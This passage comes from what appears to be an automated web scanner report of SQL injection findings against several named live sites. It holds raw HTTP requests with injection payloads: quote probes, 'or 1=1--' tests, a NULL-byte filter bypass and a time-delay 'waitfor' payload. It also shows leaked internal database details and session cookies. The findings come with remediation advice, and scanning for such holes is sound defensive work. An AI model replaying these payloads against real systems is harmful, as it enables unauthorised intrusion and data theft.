</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br>
...[SNIP]...

Request 2

GET /engine.php?ac=1'' HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/company/about-sapha
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33; sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:06:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: sapha_tst_1''=TRUE; expires=Mon, 03-May-2021 22:06:44 GMT; path=/; domain=.sapha.com
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/x-javascript
Content-Length: 5603

var SCS_tid=(SCS_tid)?escape(SCS_tid):"",NS_do=new Array('conversionsuite.com','sapha.com'),NS_fe=new Array('exe','pdf','zip','wav','mp3','mov','mpg','avi','wmv','doc','xls','wpd','ppt','swf','mpeg','
...[SNIP]...

2.4. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /engine.php?ac=/1'2546 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: dce.sapha.com

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:54:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 391

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '/1'2546'<br>
<b>MySQ
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2546'' at line 1)<br>
...[SNIP]...

Request 2

GET /engine.php?ac=/1''2546 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: dce.sapha.com

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:54:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0


2.5. http://dce.sapha.com/logging.php [ac parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /logging.php

Issue detail

The ac parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ac parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /logging.php?ac=1'&NS_sw=1920&NS_sh=1200&NS_sc=16&NS_c=yes&NS_pn=&NS_vpn=&NS_uuid=&NS_pt=Lead%20Generation%2C%20Lead%20Capture%20%26%20Website%20Conversion%20Systems%20from%20Sapha&NS_ru=&NS_rn=75869&NS_js=1.6&NS_vp=http%3A//www.sapha.com/&NS_tz=300&NS_la=&NS_tid=&NS_tamt=&NS_cid= HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 385

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '1''<br>
<b>MySQL Err
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br>
...[SNIP]...

Request 2

GET /logging.php?ac=1''&NS_sw=1920&NS_sh=1200&NS_sc=16&NS_c=yes&NS_pn=&NS_vpn=&NS_uuid=&NS_pt=Lead%20Generation%2C%20Lead%20Capture%20%26%20Website%20Conversion%20Systems%20from%20Sapha&NS_ru=&NS_rn=75869&NS_js=1.6&NS_vp=http%3A//www.sapha.com/&NS_tz=300&NS_la=&NS_tid=&NS_tamt=&NS_cid= HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response 2

HTTP/1.1 302 Found
Date: Fri, 06 May 2011 22:05:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM'
Location: http://dce.sapha.com/0.gif
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0


2.6. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s96203847790602 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://om.expedia.com
Path:   /b/ss/expedia1/1/G.9p2/s96203847790602

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b%00'/ss/expedia1/1/G.9p2/s96203847790602?[AQB]&ndh=1&t=6/4/2011%2022%3A42%3A9%205%20300&ce=ISO-8859-1&cdp=2&pageName=50053&g=http%3A//www.expedia.com/pub/agent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D3%26mnth%3D5/1/2011%26rgst%3D%250D%250Ans%3Anetsparker056650%3Dvuln%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429&c16=Head%3ANav%3AHotels%3AHotels&v28=Head%3ANav%3AHotels%3AHotels&pe=lnk_o&pev1=http%3A//www.expedia.com/Hotels&pev2=RFRR%20Action%20Link&pid=50053&pidt=1&oid=http%3A//www.expedia.com/Hotels&ot=A&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=3&mnth=5/1/2011&rgst=%0D%0Ans:netsparker056650=vuln&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; s1=`user=v.8,0,EX011A614213$F4$B5205000c$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$F9Y$D9$0A$9E$23$C5E$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`gacct=v.1,1,215819496`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:04:36 GMT
Server: Omniture DC/2.0.0
Content-Length: 393
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/expedia1/1/G.9p2/s96203847790602?[AQB]&ndh=1&t=6/4/2011%2022%3A42%3A9%205%20300&ce=ISO-8859-1&cdp=2&pageName=50053&g=http%3A//www.expedia.com/pub/agent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D3%26mnth%3D5/1/2011%26rgst%3D%250D%250Ans%3Anetsparker056650%3Dvuln%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429&c16=Head%3ANav%3AHotels%3AHotels&v28=Head%3ANav%3AHotels%3AHotels&pe=lnk_o&pev1=http%3A//www.expedia.com/Hotels&pev2=RFRR%20Action%20Link&pid=50053&pidt=1&oid=http%3A//www.expedia.com/Hotels&ot=A&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=3&mnth=5/1/2011&rgst=%0D%0Ans:netsparker056650=vuln&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; s1=`user=v.8,0,EX011A614213$F4$B5205000c$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$F9Y$D9$0A$9E$23$C5E$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`gacct=v.1,1,215819496`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:04:36 GMT
Server: Omniture DC/2.0.0
xserver: www611
Content-Length: 0
Content-Type: text/html


2.7. http://om.expedia.com/b/ss/expedia1/1/H.9-Pdvu-2/s9923706686589 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://om.expedia.com
Path:   /b/ss/expedia1/1/H.9-Pdvu-2/s9923706686589

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/expedia1/1/H.9-Pdvu-2/s9923706686589?[AQB]&ndh=1&t=6/4/2011%2022%3A42%3A16%205%20300&ce=ISO-8859-1&cdp=2&pageName=page.Hotels&g=http%3A//www.expedia.com/Hotels&r=http%3A//www.expedia.com/pub/agent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D3%26mnth%3D5/1/2011%26rgst%3D%250D%250Ans%3Anetsparker056650%3Dvuln%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429&ch=hotels&server=www.expedia.com&c2=hotels&v2=hotels&c12=80312807c795402e93c5016d2a2a3e1b&v17=page.Hotels&v18=page.Hotels&c34=842_1%7C975_0&v34=842_1%7C975_0&c50=E3.20110401&pid=50053&pidt=1&oid=http%3A//www.expedia.com/Hotels&ot=A&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/Hotels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s1=`0; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s_sess=%20s_sq%3Dexpedia1%253D%252526pid%25253D50053%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/Hotels%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B%20s_cc%3Dtrue%3B

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:12:00 GMT
Server: Omniture DC/2.0.0
Content-Length: 434
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/expedia1/1/H.9-Pdvu-2/s9923706686589 was not f
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/expedia1/1/H.9-Pdvu-2/s9923706686589?[AQB]&ndh=1&t=6/4/2011%2022%3A42%3A16%205%20300&ce=ISO-8859-1&cdp=2&pageName=page.Hotels&g=http%3A//www.expedia.com/Hotels&r=http%3A//www.expedia.com/pub/agent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D3%26mnth%3D5/1/2011%26rgst%3D%250D%250Ans%3Anetsparker056650%3Dvuln%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429&ch=hotels&server=www.expedia.com&c2=hotels&v2=hotels&c12=80312807c795402e93c5016d2a2a3e1b&v17=page.Hotels&v18=page.Hotels&c34=842_1%7C975_0&v34=842_1%7C975_0&c50=E3.20110401&pid=50053&pidt=1&oid=http%3A//www.expedia.com/Hotels&ot=A&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/Hotels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s1=`0; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s_sess=%20s_sq%3Dexpedia1%253D%252526pid%25253D50053%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/Hotels%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B%20s_cc%3Dtrue%3B

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:12:00 GMT
Server: Omniture DC/2.0.0
xserver: www391
Content-Length: 0
Content-Type: text/html


2.8. http://poll.websitegear.com/compactpoll.asp [pollID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://poll.websitegear.com
Path:   /compactpoll.asp

Issue detail

The pollID parameter appears to be vulnerable to SQL injection attacks. The payloads 18614847%20or%201%3d1--%20 and 18614847%20or%201%3d2--%20 were each submitted in the pollID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compactpoll.asp?pollID=1842018614847%20or%201%3d1--%20 HTTP/1.1
Host: poll.websitegear.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 19:31:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 98
Content-Type: text/html; Charset=utf-8
Set-Cookie: ASPSESSIONIDSACSQBTS=AFHAMOBCGELDLCGBGJFDMJMG; path=/
Cache-control: private

An error occurred on the server when processing the URL. Please contact the system administrator.

Request 2

GET /compactpoll.asp?pollID=1842018614847%20or%201%3d2--%20 HTTP/1.1
Host: poll.websitegear.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:31:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Set-Cookie: ASPSESSIONIDSACSQBTS=GFHAMOBCCFJPFMGMGBOLLEJL; path=/
Cache-control: private


2.9. https://secure.trust-guard.com/ [__utmb cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmb cookie. The application took 27759 milliseconds to respond to the request, compared with 225 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET / HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384')waitfor%20delay'0%3a0%3a20'--

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:59:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5139
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
